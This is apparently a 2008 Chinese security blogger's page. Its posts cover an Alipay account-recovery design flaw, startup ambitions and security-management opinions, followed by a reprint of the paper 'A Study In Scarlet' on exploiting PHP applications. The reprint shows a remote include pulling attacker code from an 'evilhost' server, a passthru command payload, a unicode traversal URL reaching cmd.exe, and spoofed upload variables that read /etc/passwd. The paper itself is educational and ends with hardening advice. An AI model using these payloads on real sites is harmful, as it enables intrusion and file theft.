有大量的文档要看,装了Team One's Reader
要是有电子墨水就好了,手机的屏幕看长了还是太累

2008年8月27日星期三

支付宝的设计缺陷

支付宝是淘宝账务管理中心,所有的钱都放在这儿。今天发现,有个业务上的流程存在逻辑缺陷。

只要掌握了一个用户的邮箱,就可以做很多事情了,包括修改"安全问题",修改密码,修改"绑定的手机号"。从"手机服务"中,我们可以看到,只要能改了手机号,实际上可以做许多事情了。

下面看看手机服务提供了哪些功能? 

手机找回密码 利用手机来轻松找回遗忘的密码 已开通
手机开启/关闭余额支付 您可以用手机开启或关闭账户余额支付功能 已开通
手机管理数字证书 如果您的数字证书丢失了,您可以用手机注销数字证书 已开通
手机设置安全问题 如果您忘记了安全问题,您可以通过手机重新设置 已开通 关闭
手机支付 开启手机支付功能,您将可以通过短信或语音方式付款。 已开通 关闭
手机动态口令 有了密码和手机动态口令的双重保护,您的账户安全就得到了全面的提升!
手机号码登录 如果您用手机号码做为支付宝账户名,您可以在此修改

从上面可以看到,只要得到了手机权限,这个支付宝账号基本就在控制之中了。而得到手机号,只要得到信箱权限就可以了。信箱权限怎么得就不多说了,相信很多人都掌握了若干种方法,很容易就可以控制信箱。本来这个手机服务,是为了避免信箱的安全问题,所以才提供了比信箱功能更多的权限,比如修改安全问题,数字证书,动态口令等,这些都是信箱无法提供的。现在可倒好,通过手机服务,放开大门了。

   如何通过信箱修改手机号?这是问题的关键,因为支付宝还没有修改完善相关系统,在此不多说了,只想告诉大家,非常非常简单,只是他们在设计上的一个缺陷,算不上系统漏洞。所以,一定不要逻辑混乱,清晰的业务流是非常重要的。






2008年8月25日星期一

如何发挥自己的长处

做了这么多项目,其实在评估、加固、应急、取证、恢复、追踪、渗透、咨询等多个方面都有大量实践经验,都有许多东西,是在网上查不到的,还没有写出来的。有时看一些标准化文档,看到一句话,会想到大量大量的东西,就象俗话说的,可以把一本书看到很厚的程度,但还没有看薄的功夫,做一些东西,往往抓不住重点,交流时没有足够的火力效果。

   如果要和朋友们一起合作,如何把事情做大,又能发挥出朋友的长处,我的长外?真得好好想一下,如何把每个人的理想,放到一个共同的梦想事业中去。

在博弈中成长

   认识了一位朋友,在安全圈里面认识很多人。虽然我也一直做安全,但基本认识的都是原来周围的同事,仅仅有限的几个人,更多的人只是如雷贯耳听说过,连见面都没过。
    下决心要做一番事业,是因为觉的安全服务的市场很大,做的人比较少,有几家在做的,做的效果也不好,至少我真正想解决用户的问题,不是抱着忽悠的目的。从某一方面来说,我有一些东西,可以很好地解决用户面临的安全问题,这些东西让我比较有信心,可以做出一番事业来。
   比如,我提供防病毒网关、防火墙、VPN、入侵检测、漏洞扫描、安全网站、邮件服务器、流量管理与分析统计、透明网关、网站加速网关等安全设备,但这些东西,实现都非常简单,功能和性能都存在某些不足,让我没有信心运作成一个可以卖出的产品,如果拿了这些产品去卖,技术上的积累,还欠缺许多功课,从这方面是不负责任的行为。但这些东西,可以用很低的成本,解决一些问题,可以作为一种解决方案,提供给用户,帮助他们解决一些实际问题。虽然有同类的许多产品在市场上出售,我知道他们是怎么实现的,但我还不想去做同样的事情。
   
    以后,要是有机会,只要在某方面比我强,应该让给他们机会。从长远来看,打压和霸占都没有生命力,都会对事业造成非常大的损害。国内大部分的公司,为了赚钱,可以牺牲很多东西。我的理想,要是创造自由、平等、共享的环境,让有能力发挥出自己的价值,让事业一直走向辉煌。在这个过程中,如果是我或任何其它人产生了私心,应该在最初的时候定位一种规则,让这种私心减少对事业的影响,建立足够的博弈力量。这种博弈,对事业有利,对个人成长也非常有好处。

不知道我这种想法,能吸引有想法有能力的朋友们吗?愿意一起参与进来做一番事业吗?

感觉挺邪恶

昨晚上看闭幕式,不如开幕式精彩倒也罢了,看到中间竟然毛骨悚然。

中间舞台上,一群美女穿着红色的皮衣,画着夸张的眼影。衣服和帽子看上去,一下子让人想起一句话"不爱红装爱武装",和军装似的,挺cool,但偶尔露出来的眼影,在闪光灯下,显的狐媚,整体让人感觉非常邪恶。也不知道基于什么设计目的


   奥运结束了,终于可以放开口评论一下奥运了。

2008年8月20日星期三

看了两本书,货币战争和货币贵族

直接所我看傻了,里面这么多的谋略,这么多的东西,是我以前从没想过,或者想过却一直没有找到答案的,真是不错的书

2008年8月11日星期一

关于"三分技术七分管理"

楼上众多的说法,正是我在开篇所要反对的。我没去找"三分技术七分管理"的原文是怎么描述的,但我理解,三分技术七分管理,并不指的是纯技术和纯管理,而是两者的结合,安全的过程,就是对信息资产通过技术进行管理的过程,这里面并不是规章制度,并不完全是安全方针、安全组织、资产管理、人力资源安全、信息安全事故管理、业务连续性管理、符合性,或者纯技术的安全体系,通信和操作管理、访问控制和系统开发生命周期等这些过程,而且对信息资产的有效控制上面

有七分管理这几个字眼,并不是管理就要远远重要于技术,或者技术可做的事情很少。在这上面钻的深,一切就变的虚无飘渺了。有个单位,国内多家著名安全公司给他们做了评估,做了加固,为什么我还可以通过很多方法进入内网?到底怎么样才能解决客户存在问题?你通过这些理论工具和方法论,有把握解决问题吗?

2008年8月10日星期日

接上篇

刚才没写完

alibaba独特的思路是什么并不重要,重要的是这样独特的思路是怎么出来的?我认为最关键的在于如何搜集数据,如何处理后输出,所有的功能都是这样实现的,这个过程并不是程序里面独有的,业务模式也是这样。除了数据的流程,还有一个钱的流动过程,金钱在这个数据中是如何受到影响的?alibaba/google现在看来都走了间接的道路。

     暂时没有想到去做网站,趁着年轻,还有许多有趣的东西可做,做网站太没技术含量了,和一帮抢劫的似的,哈哈,再者,网络安全服务做下来虽然收益不高,但有趣啊,让人难以拒绝的诱惑啊

     不过无论是分析alibaba的业务模式,还是想自己的创业之路,需要注意,中国并不缺少想法,但缺少坚持想法的行动,很多都是想想就算了,我能坚持多少年呢?原来的许多好主意,给别人说了,他们就去做了,自己也没有去争取着做一下。昨天和朋友交流,觉的网络安全方向,我这方面技术好,有大量产品,市场需求也非常大,我这儿有许多独到的东西,前途似乎一片美好啊,但实际上,谁知道呢,也许做一段时间才能知道。

     关注马云,关注史玉柱,他们这样的成功,也只能在中国才会出现,现在的机会,仍然非常多,等待我去开发。

现在的互联网机遇

每个时段看现在的形势,都似乎感觉遍地的竟争对手,自己可用的东西很少了。
昨天和朋友们聊天的时候,一片悲观。其实,现在看l国外google,yahoo,国内的alibaba淘宝一类的互联网,他们的成功太吓人了,咱暂且不想何时才能达到这样的高度。但现在的互联网其实还有很多机会,大量东西还没有开发,"智能系统"只是处在原始的最初阶段。只所以这样说,是因为当我们抛开功利的眼光,看眼前的这个电子世界的时候,我们会看到,所有google,alibaba的这些模式,都是数据搜集+加点彩的处理+不同的输出形式,数据搜集都是来自于注意力和广众的操作,输出形式就在于需求上变化的页面,加点彩的处理,现在看来alibaba、淘宝都还是比较简单的,后台功能实现并不复杂。为什么他们可以达到这样的成功呢?最早做这方面的,市场上有需求但没有这样的东西,怎么会不成功呢?现在的做b2b的竟争对手这么多,他们肯定也不会停步不前,看alibaba的模式,最主要的是有那么独特的思路。

2008年8月5日星期二

三分技术七分管理是错误的

     以前听很多人说,三分技术七分管理,似乎真的是正确的,只要打好了补丁,贯彻了安全策略,基本就可以保证一个信息系统的安全了。
 
      现在才看到,这里面有多大的误区,有多少懒惰的因素,有多少拍马屁的成分在里面,只是拿了井底之蛙的眼光,去简单地看一个复杂的信息系统。实际上,完整的话应该这样说,三分技术七分管理,管理要以技术为依托。没有了技术,管理就无法贯彻下来,就没有实现的途径,就会受限于你的视野,实际上,管理上也并不是思想上、哲学上的那种管理,而是对每一个安全策略,每一个数据流,每一个访问路径的管理,是对信息资产的有效管理,是以技术手段实现的管理。而不是官僚们给你安排你应该如何如何的那种管理。
 
      有许多事情就这样耽误了,可能会出大问题。不知道还有许多人相信"三分技术七分管理",奥运保障是否也是基于这个出发点,许多人躺在一堆安全设备上悠闲自得。很长时间以前我就说过了,现在的安全防护模式,远远落后于现实的网络攻击手段,除非那帮有恶意目的人不掌握,只要掌握了,就会造成很严重的后果。现在的情况是,我们无法预测对方到底掌握了多少东西,可以利用多少资源,可以造成多大的危害。
 
    前几天在新疆的汽车炸弹,死16人伤16人,2名嫌疑犯最后终于逮到了。新闻里忽略了一个细节,我猜测应该是对方假装失火,武警们出于责任,跑上去扑灭大火的时候才炸的吧,不然就那么冲过来一辆车,一下子就炸了?而且嫌疑犯最后还跑了?
 
     和所有的网络攻击一样,最难预防的是,一切的操作隐藏于正常行为之中,以前的多篇blog中也有描述,这是网络攻击的最高境界,也是最难防御的。而一般的杀毒、IDS、ips、防火墙一类的安全设备,都是通过特征匹配的,所以,只要攻击行为换套马甲,安全设备就需要升级特征码,如果攻击行为更有创意,更有思路,安全设备几乎就全部废了。 这就是咱们的安全现状,这就是我们最担心的地方。大家以为许多问题已经解决了,终于可以休息一下好好睡一觉了,实际上,危害正在发生,有些已经深入内部了,管理者不知道,技术人员也没有觉察,一切正在悄悄地进行着。
 
    现在别跟我再提三分技术七分管理,听着就生气,恨不得海扁一顿。我们的世界,自己做主。

2008年8月1日星期五

php安全(转文)

http://www.securereality.com.au/studyinscarlet.txt
<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<->>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>

A Study In Scarlet
Exploiting Common Vulnerabilities in PHP Applications

Shaun Clowes
SecureReality

"A reprint of reminisces from the Blackhat Briefings Asia 2001"

<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<->>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>

--- < Table of Contents > --------------------------------------------------

1. Introduction
2. Caveats and Scope
3. Global Variables
4. Remote Files
5. File Upload
6. Library Files
7. Session Files
8. Loose Typing And Associative Arrays
9. Target Functions
10. Protecting PHP
11. Responsibility - Language vs Programmer
12. Other

"I could imagine his giving a friend a little pinch of the latest vegetable
alkaloid, not out of malevolence, you understand, but simply out of a spirit
of inquiry in order to have an accurate idea of the effects." - Stamford

--- < 1. Introduction > ----------------------------------------------------

This paper is based on my speech during the Blackhat briefings in Singapore
and Hong Kong in April 2001. The speech was entitled "Breaking In Through
the Front Door - The impact of Web Applications and Application Service
Provision on Traditional Security Models". It initially discussed the trend
towards Web Applications (and ASP) and the holes in traditional security
methodology exposed by this trend. However, that's a long and boring
discussion so I'll save it for the policy makers.

The rest of the speech was spent talking about PHP. For those reading this
paper who don't know what PHP is, PHP stands for "PHP Hypertext
Preprocessor". It's a programming language (designed specifically for the
Web) in which PHP code is embedded in web pages. When a client requests a
page, the Web Server first passes the page to the language interpreter so
the code can be executed, the resulting page is then returned to the client.

Obviously this approach is much more suited to the page by page nature of
web transactions than traditional CGI languages such as Perl and C. PHP (and
to some extent other Web Languages) has the following characteristics:
+ Interpreted
+ Fast Execution - The interpreter is embedded in the web server, no fork()
or setup overhead
+ Feature Rich - Hundreds of non trivial builtin functions
+ Simple Syntax - Non declared and loosely typed variables, 'wordy'
function names

Over the course of this paper I'm going to try to explain why I feel the
last two characteristics make applications written in PHP easy to attack and
hard to defend. Then I'll finish off with a rant about distribution of
'blame' when it comes to software security.

"You must study him, then ... you'll find him a knotty problem, though. I'll
wager he learns more about you than you about him." - Stamford

--- < 2. Caveats and Scope > -----------------------------------------------

Almost all the observations in this paper refer to a default install of PHP
4.0.4pl1 (with MySQL, PostgreSQL, IMAP and OpenSSL support enabled) running
as a module under Apache 1.3.19 on a Linux machine. This of course means
that your mileage may vary, in particular, there have been many many
versions of PHP and they sometimes exhibit vastly different behaviour given
the same input.

Also, proponents of PHP tend to defend the language based on its extreme
configurability. I feel very confident the vast majority of users will not
modify the default PHP configuration at all, lest some of the amazing array
of freely available PHP software stop working. Thus I don't feel pressured
to defend my position based on configuration options, nonetheless I've
included a section about how to go defending PHP applications using these
configuration options.

Finally, some people deride this kind of work as 'trivial' or 'obvious',
particularly since I won't be discussing any specific vulnerabilities in
particular pieces of PHP software. To prove the risks are real and that even
programmer's that try hard fall into these traps 4 detailed advisories in
regards to specific pieces of vulnerable software will be released shortly
after this paper.

"I have to be careful ... for I dabble with poisons a good deal." - Sherlock
Holmes

--- < 3. Global Variables > ------------------------------------------------

As mentioned earlier, variables in PHP don't have to be declared, they're
automatically created the first time they are used. Nor are they
specifically typed, they're typed automatically based on the context in
which they are used. This is an extremely convenient way to do things from a
programmer's perspective (and is obviously a useful feature in a rapid
application development language). Once a variable is created it can be
referenced anywhere in the program (except in functions where it must be
explicitly included in the namespace with the 'global' function). The result
of these characteristics is that variables are rarely initialized by the
programmer, after all, when they're first created they are empty (i.e "").

Obviously the main function of a PHP based web application is usually to
take in some client input (form variables, uploaded files, cookies etc),
process the input and return output based on that input. In order to make it
as simple as possible for the PHP script to access this input, it's actually
provided in the form of PHP global variables. Take the following example
HTML snippet:

<FORM METHOD="GET" ACTION="test.php">
<INPUT TYPE="TEXT" NAME="hello">
<INPUT TYPE="SUBMIT">
</FORM>

Obviously this will display a text box and a submit button. When the user
presses the submit button the PHP script test.php will be run to process the
input. When it runs the variable $hello will contain the text the user
entered into the text box. It's important to note the implications of this,
this means that a remote attacker can create any variable they wish and have
it declared in the global namespace. If instead of using the form above to
call test.php, an attacker calls it directly with a url like
"http://server/test.php?hello=hi&setup=no", not only will $hello = "hi" when
the script is run but $setup will be "no" also.

An example of how this can be a real problem might be a script that was
designed to authenticate a user before displaying some important
information. For example:

<?php
if ($pass == "hello")
$auth = 1;
...
if ($auth == 1)
echo "some important information";
?>

In normal operation the above code will check the password to decide if the
remote user has successfully authenticated then later check if they are
authenticated and show them the important information. The problem is that
the code incorrectly assumes that the variable $auth will be empty unless it
sets it. Remembering that an attacker can create variables in the global
namespace, a url like 'http://server/test.php?auth=1' will fail the password
check but the script will still believe the attacker has successfully
authenticated.

To summarize the above, a PHP script _cannot trust ANY variable it has not
EXPLICITLY set_. When you've got a rather large number of variables, this
can be a much harder task than it may sound.

Once common approach to protecting a script is to check that the variable is
not in the array HTTP_GET/POST_VARS[] (depending on the method normally used
to submit the form, GET or POST). When PHP is configured with track_vars
enabled (as it is by default) variables submitted by the user are available
both from the global variables and also as elements in the arrays mentioned
above. However, it's important to note that there are FOUR different arrays
for remote user input, HTTP_GET_VARS for variables submitted in the URL of
the get request, HTTP_POST_VARS for variables submitted in the post section
of a HTTP request, HTTP_COOKIE_VARS for variables submitted as part of the
cookie headers in the HTTP request and to a limited degree the
HTTP_POST_FILES array (in more recent versions of PHP). It is completely the
end users choice which method they use to submit variables, one request can
easily place variables in all four different arrays, a secure script needs
to check all four (though again, the HTTP_POST_FILES array shouldn't be an
issue except in exceptional circumstances).

"No man burdens his mind with small matters unless he has some very good
reason for doing so." - John Watson

--- < 4. Remote Files > ----------------------------------------------------

I'm going to repeat this frequently during this document but it bears
repeating, PHP is an extremely feature rich language. It ships with an
amazing amount of functionality out of the box and tries hard to make life
as easy as possible for the coder (or web designer as the case so often is).
From a security perspective, the more superfluous functionality offered by a
language and the less intuitive the possibilities, the more difficult it is
to secure applications written in it. An excellent example of this is the
Remote Files functionality of PHP.

The following piece of PHP code is designed to open a file:

<?php
if (!($fd = fopen("$filename", "r"))
echo("Could not open file: $filename<BR>\n");
?>

The code attempts to open the file specified in the variable $filename for
reading and if it fails displays an error. Obviously this could be a simple
security issue if the user can set $filename and get the script to expose
/etc/passwd for example but one non intuitive this code could end up doing
is reading data from another web/ftp site. The remote files functionality
means that the majority of PHPs file handling functions can work
transparently on remote files via HTTP and FTP. If $filename were to contain
(for example)
"http://target/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir" PHP will
actually make a HTTP request to the server "target", in this case trying to
exploit the unicode flaw.
This gets more interesting in the context of four other file functions that
support remote file functionality (*** except under Windows ***), include(),
require(), include_once() and require_once(). These functions take in a
filename and read that file and parse it as PHP code. They're typically used
to support the concept of code libraries, where common bits of PHP code are
stored in files and included as needed. Now take the following piece of
code:

<?php
include($libdir . "/languages.php");
?>

Presumably $libdir is a configuration variable that is meant to be set
earlier in script execution to the directory where the library files are
stored. If the attacker can cause the variable not to be set the script
(which is typically not a tremendously difficult task) and instead submit it
themselves they can modify the start of the path. This would normally gain
them nothing since they still end up only being able to access languages.php
in a directory of their choosing (poison null attacks like those possible on
Perl don't work under PHP) but with remote files the attack can submit any
code they wish to be executed. For example, if the attacker places a file on
a web server called languages.php containing the following:

<?php
passthru("/bin/ls /etc");
?>

then sets $libdir to "http://<evilhost>/" upon encountering the include
statement PHP will make a HTTP request to evilhost, retrieve the attackers
code and execute it, returning a listing of /etc to the attackers web
browser. Note that the attacking webserver (evilhost) can't be running PHP
or the code will be run on the attacking machine rather than the target
machine (see the "Other" section and its reference to SRADV00006 for an
example of code which survives being on a PHP enabled attacking machine).

"There are no crimes and no criminals in these days" - Sherlock Holmes

--- < 5. File Upload > -----------------------------------------------------

As if PHP hadn't already provided enough to make life easier for the
attacker the language provides automatic support for RFC 1867 based file
upload. Take the following form:

<FORM METHOD="POST" ENCTYPE="multipart/form-data">
<INPUT TYPE="FILE" NAME="hello">
<INPUT TYPE="HIDDEN" NAME="MAX_FILE_SIZE" VALUE="10240">
<INPUT TYPE="SUBMIT">
</FORM>

This form will allow the web browser user to select a file from their local
machine then when they click submit the file will be uploaded to the remote
web server. This is obviously useful functionality but is PHPs response that
makes this dangerous. When PHP first receives the request, before it has
even BEGUN to parse the PHP script being called it will automatically
receive the file from the remote user, it will then check that the file is
no larger than specified in the $MAX_FILE_SIZE variable (10 kb in this case)
and the maximum file size set in the PHP configuration file, if it passes
these tests the file is SAVED on the local disk in a temporary directory.
Please read that again if that doesn't make you blink, a remote user can
send any file they wish to a PHP enabled machine and before a script has
even specified whether or not it accepts file uploads that file is SAVED on
the local disk.

I'm going to ignore any resource exhaustion attacks that may or may not be
possible using file upload functionality, I think they're fairly limited if
not impossible in any case.

First let's consider a script that IS designed to receive file uploads. As
described above the file is received and saved on the local disk (in the
location specified in the configuration for uploaded files, typically /tmp)
with a random filename (e.g "phpxXuoXG"). The PHP script then needs
information regarding the uploaded file to be able to process it. This is
actually provided in two different ways, one has been in use since early
versions of PHP 3, the other was introduced following our Advisory regarding
the issue I'm about to describe with the former method. Suffice to say the
problem is still alive and well, most scripts continue to use the old
method. PHP sets four global variables to describe the uploaded file, for
example (given the upload form above):

$hello = Filename on local machine (e.g "/tmp/phpxXuoXG")
$hello_size = Size in bytes of file (e.g 1024)
$hello_name = The original name of the file on the remote system (e.g
"c:\\temp\\hello.txt")
$hello_type = Mime type of uploaded file (e.g "text/plain")

The PHP script then proceeds to work on the file as located via the $hello
variable. The problem is that it isn't immediately obvious that $hello need
not really be a PHP set variable and can simply be set by a remote attacker.
Take the following form input for example:


http://vulnhost/vuln.php?hello=/etc/passwd&hello_size=10240&hello_type=text/
plain&hello_name=hello.txt

That results in the following global PHP variables (of course POST could be
used (even cookies)):

$hello = "/etc/passwd"
$hello_size = 10240
$hello_type = "text/plain"
$hello_name = "hello.txt"

This form input will provide exactly the variables the PHP scripts expects
to be set by PHP, but instead of working on an uploaded file the script will
infact be working on /etc/passwd (usually resulting in its content being
exposed). This attack can be used to expose the contents of all sorts of
sensitive files (in particular configuration files containing database and
other third tier server credentials).

I noted above that newer versions of PHP provide different methods for
determining the uploaded files (it's done via the HTTP_POST_FILES[] array
mentioned earlier). It also provides numerous functions to avoid this
problem, for example a function to determine if a particular file is
actually one that has been uploaded. These methods well and truly fix the
problem but there is certainly no shortage of scripts out there still using
the old method and still vulnerable to this sort of attack.

As an alternate attack assisted by file upload consider the following
example PHP code:

<?php
if (file_exists($theme)) // Checks the file exists on the local system (no
remote files)
include("$theme");
?>

If the attacker can control $theme they can obviously use this to read any
file on the remote system (except that content inside PHP tags e.g "<?" will
be removed and interpreted probably crashing immediately). While this is a
problem the attackers ultimate goal is obviously to be able to execute
commands on the remote web server and they can't achieve that by getting the
include statement to work on remote files as discussed earlier. They
therefore need to get PHP code they define into a file local to the remote
machine. This sounds like an impossible task initially but file upload comes
to the rescue. If the attacker creates a file on their machine containing
PHP code to be executed (for example the passthru code shown earlier) then
creates a form which contains a file field called "theme" and uses this form
to submit the file to the script via file upload, PHP will be kind enough to
save the file and set $theme to the location of the attackers file on the
local machine. The file_exists() check will then succeed and the code will
be run.

Given command execution ability on the remote webserver the attacker will
obviously wish to attempt privilege escalation attacks or attacks on the
third tier servers, both of which will probably require a toolset not
present on the webserver. The file upload functionality once again makes
this a non issue, the attacker can simply upload the attack tools, have them
saved by PHP then use their code execution ability to chmod() the file and
execute it. For example, they could trivially upload a local root exploit
(through the firewall and past the IDS) and execute it.

"It was easier to know it than to explain why I knew it. If you were asked
to prove that two and two made four, you might find some difficulty, and yet
you are quite sure of the fact" - Sherlock Holmes

--- < 6. Library Files > ---------------------------------------------------

I've mentioned the include() and require() functions earlier, I also said
that they're generally used to support the concept of code libraries. What I
mean by that is that common bits of code are put into a separate file and
when needed in the application simply include()ed from the file. include()
and require() will take any specified filename and read the file and parse
its contents as PHP code.

Initially when people started developing and distributing PHP applications
they chose to distinguish library and main application code by giving
library files the '.inc' extension. However they quickly found this was a
bad move in general since such files aren't normally parsed as PHP code by
the PHP interpreter. If requested from the web server they will generally
have the full source code returned. This is because the PHP interpreter
(when used as an apache module) determines which files to parse for PHP code
based on the file's extension, the extensions to be interpreted can be
chosen by the administrator but usually a combination of the extensions
'.php', '.php4' and '.php3' is chosen. This is a real problem when sensitive
configuration data (e.g database credentials) is placed in PHP files that
don't have an appropriate extension since a remote attacker can easily get
the source.

The simplest solution (and the one that has since become favored) is simply
to give EVERY file a PHP parsed extension. This prevents a request to the
web server ever returning the raw source for a file that contains PHP code.
The problem here is that though the source will no longer be returned, by
requesting the file a remote attacker can have the code that is meant to be
used in a framework of other code executed out of context. This can lead to
all of the attacks I've described earlier.

An obvious example might be the following:

In main.php:
<?php
$libDir = "/libdir";
$langDir = "$libdir/languages";

...

include("$libdir/loadlanguage.php":
?>

In libdir/loadlanguage.php:
<?php
...

include("$langDir/$userLang");
?>

When libdir/loadlanguage.php is called in the defined context of main.php it
is perfectly safe. But because libdir/loadlanguage has the extension .php
(it doesn't have to have that extension, include() works on any file) it can
be requested and executed by a remote attacker. When out of context an
attacker can set $langDir and $userLang to whatever they wish.

"You know a conjuror gets no credit when once he has explained his trick and
if I show you too much of my method of working, you will come to the
conclusion that I am a very ordinary individual after all" - Sherlock Holmes

--- < 7. Session Files > ---------------------------------------------------

Later versions of PHP (4 and above) provide built-in support for 'sessions'.
Their basic purpose is to be able to save state information from page to
page in a PHP application. For example, when a user logs in to a web site,
the fact that they are logged in (and who they are logged in) could be saved
in the session. When they move around the site this information will be
available to all other PHP pages. What actually happens is that when a
session is started (it's typically set in the configuration file to be
automatically started on first request) a random session id is generated,
the session persists as long as the remote browser always submits this
session id with requests. This is most easily achieved with a cookie but can
also be done by achieved by putting a form variable (containing the session
id) on every page. The session is a variable store, a PHP application can
choose to register a particular variable with the session, its value is then
stored in a session file at the end of every PHP script and loaded into the
variable at the start of every script. A trivial example is as follows:

<?php
session_destroy(); // Kill any data currently in the session
$session_auth = "shaun";
session_register("session_auth"); // Register $session_auth as a session
variable
?>

Any later PHP scripts will automatically have the variable $session_auth set
to "shaun", if they modify it later scripts will receive the modified value.
This is obviously a very handy facility to have in a stateless environment
like the web but caution is also necessary.

One obvious problem is with insuring that variables actually come from the
session. For example, given the above code, if a later script does the
following:

<?php
if (!empty($session_auth))
// Grant access to site here
?>

This code makes the assumption that if $session_auth is set, it must have
come from the session and not from remote input. If an attacker specified
$session_auth in form input they can gain access to the site. Note that the
attacker must use this attack before the variable is registered with the
session, once a variable is in a session it will override any form input.

Session data is saved in a file (in a configurable location, usually /tmp)
named 'sess_<session id>'. This file contains the names of the variables in
the session, their loose type, value and other data. On multi host systems
this can be an issue since the files are saved as the user running the web
server (typically nobody), a malicious site owner can easily create a
session file granting themselves access on another site or even examine the
session files looking for sensitive information.

The session mechanism also supplies another convenient place that an
attacker have their input saved into a file on the remote machine. For
examples above where the attacker needed PHP code in a file on the remote
machine, if they cannot use file upload they can often use the application
and have a session variable set to a value of their choosing. They can then
guess the location of the session file, they know the filename 'php<session
id>' they just have to guess the directory, usually /tmp.

Finally an issue I haven't found a use for is that an attacker can specify
any session id they wish (e.g 'hello') and have a session file created with
that id (for the example '/tmp/sess_hello'). The id can only contain
alphanumeric characters but this might well be useful in some situations.

"It is a mistake to confound strangeness with mystery" - Sherlock Holmes

--- < 8. Loose Typing And Associative Arrays > -----------------------------

Just a quick note about these factors.

PHP is a loosely typed language, that is, a variable has different values
depending on the context in which it is being evaluated. For example, the
variable $hello set to the empty string "" when evaluated as a number has
the value 0. This can sometimes lead to non intuitive results (a factor that
was important in the exploitation of phpMyAdmin in SRADV00008). If $hello is
set to "000" it is NOT equal to "0" nor will the function empty() return
true.

PHP arrays are associative, that is, the index to the array is a STRING and
can be set to any string value, it is not numerically evaluated. This means
that the array entry $hello["000"] is NOT the same as the array entry
$hello[0].

Applications need to be careful to validate user input with thought to the
above factors and to do so consistently. I.e don't test is something is
equal to 0 in one place and then validate it using empty() somewhere else.

"We want something more than mere preaching now" - Mr. Gregson

--- < 9. Target Functions > ------------------------------------------------

When looking for holes in PHP applications (when you have the source code)
it's useful to have a list of functions that are frequently misused or are
good targets if they happen to be used in a vulnerable manner in the target
application. If a remote user can affect the parameters to these functions
exploitation is often possible. The following is a non exhaustive breakdown.

PHP Code Execution:
require() and include() - Both these functions read a specified file and
interpret the contents as PHP code
eval() - Interprets a given string as PHP code
preg_replace() - When used with the /e modifier this function interprets the
replacement string as PHP code

Command Execution:
exec() - Executes a specified command and returns the last line of the
programs output
passthru() - Executes a specified command and returns all of the output
directly to the remote browser
`` (backticks) - Executes the specified command and returns all the output
in an array
system() - Much the same as passthru() but doesn't handle binary data
popen() - Executes a specified command and connects its output or input
stream to a PHP file descriptor

File Disclosure:
fopen() - Opens a file and associates it with a PHP file descriptor
readfile() - Reads a file and writes its contents directly to the remote
browser
file() - Reads an entire file into an array

"There is mystery about this which stimulates the imagination; where there
is no imagination there is no horror" - Sherlock Holmes

--- < 10. Protecting PHP
> --------------------------------------------------

All of the attacks I've described above work perfectly on a default
installation of PHP 4. However as I've mentioned numerous times PHP is
endlessly configurable and many of these attacks can be defeated using those
configuration options. There is always a price for security though, so I've
classified the following configuration options according to their
painfulness:
* = Mostly painless
** = Vaguely painful
*** = Seriously hurts
**** = Chinese Water Torture

Obviously my ratings are subjective so don't flame me for them. I will say
one thing though, if you use all of the options you'll have a very secure
PHP installation, even third party code will be reliably secure, it's just
that most of it won't work :)

**** - Set register_globals off
This option will stop PHP creating global variables for user input. That is,
if a user submits the form variable 'hello' PHP won't set $hello, only
HTTP_GET/POST_VARS['hello']. This is the mother of all other options and is
best single option for PHP security, it will also kill basically every third
party application available and makes programming PHP a whole lot less
convenient.

*** - Set safe_mode on
I'd love to describe exactly what safe_mode does but it isn't documented
completely. It introduces a large variety of restrictions including:
- The ability to restrict which commands can be executed (by exec() etc)
- The ability to restrict which functions can be used
- Restricts file access based on ownership of script and target file
- Kills file upload completely
This is a great option for ISP environments (for which it is designed) but
it can also greatly improve the security of normal PHP environments given
proper configuration. It can also be a complete pain in the neck.

** - Set open_basedir
This option prevents any file operations on files outside specified
directories. This can effectively kill a variety of local include() and
remote file attacks. Caution is still required in regards to file upload and
session files.

** - Set display_errors off, log_errors on
This prevents PHP error messages being displayed in the returned web page.
This can effectively limit an attackers exploration of the function of the
script they are attacking. It can also make debugging very frustrating.

* - Set allow_url_fopen off
This stops remote files functionality. Very few sites really need this
functionality, I absolutely recommend every site set this option.

There may well be other great options I'm missing, please consult the PHP
documentation

"Our ideas must be as broad as nature if we are to interpret nature" -
Sherlock Holmes

--- < 11. Responsibility - Language Vs Programmer
> -------------------------

I contend that it is very hard to write a secure PHP application (in the
default configuration of PHP), even if you try. It's not that PHP is a bad
language, it's amazingly easy to program in and has more builtin features
than any other language I know. However PHP has such emphasis on rapid
development and feature richness that two things happen:
- Web designers and other non coders end up writing PHP applications. They
have no understanding whatsoever of the security implications of the code
they are writing. Partly this is because the mindset isn't what it should
be. A PHP application typically runs in the most exposed environment
possible, a universally accessible page on a web server. This means the
mindset should be of coding a network daemon that will be routinely
attacked, or of a setuid root application. Instead the mindset is
functionality at all costs like it would be while writing an unprivileged
local application. If your web server is penetrated it provides a gateway to
the third tier, it is always a bad thing, even if the access is as nobody
(as penetrating a PHP application will typically provide).
- Code behaviour becomes unpredictable. An include() statement that
postfixes a user variable with "image.php" would normally be perfectly safe,
the user can only specify which directory to retrieve that file from (and
presumably cannot create a file image.php on the remote machine). When
remote files functionality is allowed it becomes a nightmare. This is
completely non intuitive.

A lot of people blame programmer's for the code they write, I personally
feel that if a language makes it hard for a programmer to write good code
(particularly by being counterintuitive) the language must itself take some
of the blame for the situation. It's not good enough to just say the
programmer should know better. In almost every PHP application I've audited
the programmer's have _tried_ to get it right and only been let down by
their understanding of the intricacies of PHP. In its search for the
ultimate functionality PHP has undermined the programmer's ability to
understand the workings of their code in all situations.

"I have all the facts in my journal, and the public shall know them" - John
Watson

--- < 12. Other
> -----------------------------------------------------------

This is just a section for various other resources.

At a time when I thought no-one else was interested in PHP security, a few
great posts/advisories/papers have popped up:
- Rain Forest Puppy
RFP 2101 - "RFPlutonium to fuel your PHP-Nuke"
http://www.wiretrip.net/rfp/p/doc.asp?id=60&iface=2
- Jo� Gouveia
Many posts to Bugtraq, check them all out, but as a selection
http://www.securityfocus.com/templates/archive.pike?list=1&mid=165519
http://www.securityfocus.com/templates/archive.pike?list=1&mid=147104
- Jouko Pynnonen
http://www.securityfocus.com/templates/archive.pike?list=1&mid=169045

There are many others, sorry I didn't list them all.

SecureReality have released a number of advisories regarding PHP
applications which should serve to illustrate the problems I've outlined in
this paper fairly well:
